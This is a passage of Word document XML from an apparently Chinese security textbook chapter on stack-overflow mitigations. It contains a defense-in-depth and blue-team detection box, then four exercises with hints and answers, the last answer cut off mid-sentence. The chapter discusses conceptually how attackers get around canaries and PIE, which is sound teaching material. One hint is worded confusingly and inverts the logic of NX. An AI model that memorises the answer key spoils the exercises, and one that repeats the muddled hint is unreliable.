          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项（GCC/Clang），且系统必须开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">才能发挥作用①。PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协同工作：没有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR，PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就没有随机性；没有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE，ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就在主代码段上留下死穴。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="268"/>
    <w:bookmarkStart w:id="269" w:name="防御纵深与蓝队检测强制防御收口框"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御纵深与蓝队检测（强制防御收口框）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述四项机制单看都非绝对，但组合在一起便构成“纵深防御”，使成功利用栈溢出漏洞的难度呈指数级上升：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">迫使攻击者必须走代码复用路线；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR + PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">又让代码复用所需的地址难以预测；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则让单纯的连续写入无法直接篡改返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者要攻破这一组合，往往需要同时具备：一个信息泄露漏洞来获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和代码地址，以及一个能控制写目标的漏洞来构造特定的内存写（或利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ret2libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的复杂变种）。这在现实中显著降低了大规模、自动化利用的成功率，并将攻击成本推高到只有具备高度专业技能的攻击者才可能承受的水平。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：构建防御纵深的全栈实践</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">编译期全面启用缓解（必选）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C/C++ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">项目应强制使用如下编译/链接选项：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fstack-protector-strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（启用栈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">canary，强覆盖）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-pie -fPIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（生成位置无关可执行文件）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z noexecstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（栈不可执行）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O2 -D_FORTIFY_SOURCE=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强化常用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数，加入额外边界检查）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMake/Makefile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中将这些选项设为默认。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全编码与库函数选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">始终使用带长度限制的安全字符串函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strncpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strlcpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">snprintf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等替代传统的不安全函数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strcpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）；对所有外部输入执行严格的长度和格式校验。推荐使用静态分析工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Coverity，Clang</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Static </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyzer）在开发阶段发现缓冲区溢出风险。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">现代内存安全语言</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于新项目，优先选用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Rust、Go、C#、Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等带有自动边界检查和内存管理的语言，从根本上消除内存破坏漏洞。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与响应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">崩溃监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd-coredump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Linux）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows Error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting，采集并分析因</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIGSEGV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIGABRT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失败触发）产生的核心转储。异常的指令指针值、被覆盖的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值都是入侵指标。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">利用缓解特征捕获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eBPF、sysmon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等机制，监控进程中是否存在堆栈执行尝试（违反</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NX）、异常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mprotect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用尝试修改代码段权限等行为。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补丁与配置基线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保操作系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处于最高随机化等级（Linux：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/sys/kernel/randomize_va_space=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），并持续跟踪编译器缓解的默认变更（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fstack-clash-protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等新选项）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="269"/>
    <w:bookmarkStart w:id="270" w:name="习题-15"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设一个程序存在栈缓冲区溢出，但系统开启了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NX、栈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary、ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE。请简要说明每项机制分别破坏了攻击者完成利用所需的哪条核心假设。（提示：想想攻击者需要什么条件；不要描述机制本身，而是描述“它让攻击者不能做什么”）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">既然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随机化了地址，为什么仍然需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE？如果只启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而没有用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PIE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编译主程序，攻击者能做什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如何被绕过？请仅从“攻击者需要额外获得什么能力”的角度进行概念性回答，不要给出具体代码或构造方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（迁移思考）一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语言编写的网络服务接受客户端输入到固定大小的栈缓冲区。你作为运维/蓝队人员，如何不接触源代码就从行为特征上判断该服务是否可能遭受了栈溢出攻击？列出至少两种在系统层面可观察到的异常模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示与解答</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：NX：让攻击者没想到栈上的数据也能被执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跑不起来；Canary：让攻击者以为可以悄无声息覆盖返回地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">覆盖前必须修改且不能破坏哨兵值；ASLR：让攻击者以为知道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或栈的绝对地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有地址都变了，无法写死；PIE：让攻击者以为至少主程序代码位置是固定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现在也不是了。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以随机化库、栈、堆等区域，但若主程序未编译为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE，其代码段通常加载在固定地址（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x400000）。攻击者就可以使用主程序自身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造攻击链，无需泄露代码地址。PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消除了这块固定地址区域，迫使攻击者也必须泄露主程序的基址。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要攻击者有能力在覆盖返回地址之前，先通过某种方式（例如信息泄露漏洞）读取到栈上的</w:t>
      </w:r>
      <w:r>
